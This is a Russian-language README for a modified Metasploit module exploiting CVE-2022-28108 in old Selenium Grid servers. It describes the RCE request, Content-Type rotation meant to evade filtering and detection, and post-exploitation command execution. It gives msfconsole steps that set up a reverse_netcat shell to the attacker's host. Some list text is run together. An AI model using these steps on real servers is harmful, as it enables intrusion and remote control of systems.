
Этот репозиторий содержит модифицированную версию модуля Metasploit, который эксплуатирует уязвимость удалённого выполнения кода (Remote Code Execution) в старых версиях Selenium Server (Grid).
Пожалуйста, внимательно прочитайте этот README перед использованием данного кода.
Благодарность авторам оригинального кода:
Этот модуль основан на отличной работе авторов оригинального модуля Metasploit для CVE-2022-28108. Основная функциональность эксплуатации уязвимости Selenium Server во многом основана на их реализации. Мы признаём и ценим их вклад в сообщество специалистов по безопасности.
'Author'). Пожалуйста, обратитесь к оригинальному модулю, чтобы узнать их имена.Используемая уязвимость:
Этот модуль нацелен на CVE-2022-28108 — уязвимость межсайтовой подделки запроса (CSRF) в Selenium Server (Grid) версиях до 4.0.0-alpha-7. Уязвимость возникает из-за того, что сервер допускает не-JSON типы контента (такие как text/plain, application/x-www-form-urlencoded и multipart/form-data) для определённых запросов. Злоумышленник может использовать это для отправки вредоносных запросов, что приводит к удалённому выполнению кода (RCE) на сервере.
Как работает оригинальный код:
Оригинальный модуль Metasploit эксплуатирует эту уязвимость, отправляя специально сформированный POST-запрос к конечной точке /wd/hub/session уязвимого Selenium Server. Этот запрос использует не-JSON Content-Type (а именно text/plain) и содержит вредоносные конфигурации в goog:chromeOptions желаемых возможностей браузера. Это позволяет злоумышленнику указать произвольный бинарный файл (например, /usr/bin/python3) и аргументы, которые будут выполнены на сервере при создании новой сессии браузера.
Изменения и улучшения в этой версии:
Этот репозиторий содержит модифицированную версию оригинального модуля Metasploit. Основные изменения включают:
Content-Type. Это включает text/plain, application/x-www-form-urlencoded и multipart/form-data. Это делается для потенциального обхода базовых механизмов фильтрации или обнаружения, которые могут искать конкретный Content-Type.execute_post_exploitation: Добавлена новая функция execute_post_exploitation(session_response). Эта функция вызывается после успешной эксплуатации и предназначена для выполнения базовых задач пост-эксплуатации. В текущей реализации она включает:
execute_command_on_target: Добавлена ещё одна новая функция execute_command_on_target(command). Эта функция позволяет выполнять произвольные команды на целевой системе после успешного эксплойта. Она используется внутри функции execute_post_exploitation и может быть расширена для дальнейших действий пост-эксплуатации.Ключевые различия:
Основное различие заключается в методе exploit и добавлении двух новых функций.
exploit: Был направлен на отправку одного запроса с Content-Type: text/plain.exploit: Перебирает различные значения Content-Type, пытаясь эксплуатировать уязвимость с каждым из них. После успешной эксплуатации он вызывает функцию execute_post_exploitation.execute_post_exploitation и execute_command_on_target являются полностью новыми дополнениями этой модифицированной версии, обеспечивающими расширенные возможности пост-эксплуатации.Как использовать модифицированный модуль:
.rb (например, selenium_rce_extended.rb)./usr/share/metasploit-framework/modules/exploits/ или ~/.msf4/modules/exploits/. Обратитесь к вашей установке Metasploit, чтобы узнать точное расположение.msfconsole.use exploit/selenium_rce_extended (или путь, по которому вы сохранили файл, если вы поместили его в подкаталог).msf6 exploit(selenium_rce_extended) > set RHOSTS <target_ip>
msf6 exploit(selenium_rce_extended) > set RPORT <target_port>
msf6 exploit(selenium_rce_extended) > set PAYLOAD cmd/unix/reverse_netcat
msf6 exploit(selenium_rce_extended) > set LHOST <your_ip>
msf6 exploit(selenium_rce_extended) > set LPORT <your_port>
Важные замечания (Дисклеймер):
Отказ от ответственности:
Автор(ы) этого модифицированного кода не несут ответственности за любое неправомерное использование или ущерб, причинённый в результате использования данного модуля. Используя этот код, вы соглашаетесь нести полную ответственность за свои действия.
Лицензия:
Этот модифицированный код, вероятно, распространяется под той же лицензией, что и оригинальный Metasploit Framework (обычно это лицензия MSF). Подробности смотрите в лицензии оригинального Metasploit Framework.
Участие в разработке:
Приветствуются вклад и улучшения этого модуля. Не стесняйтесь отправлять pull request с исправлениями ошибок, улучшениями или новыми функциями.
Благодарности:
Мы ещё раз выражаем благодарность авторам оригинального модуля Metasploit для CVE-2022-28108. Их работа является основой этого модифицированного модуля.
exploit.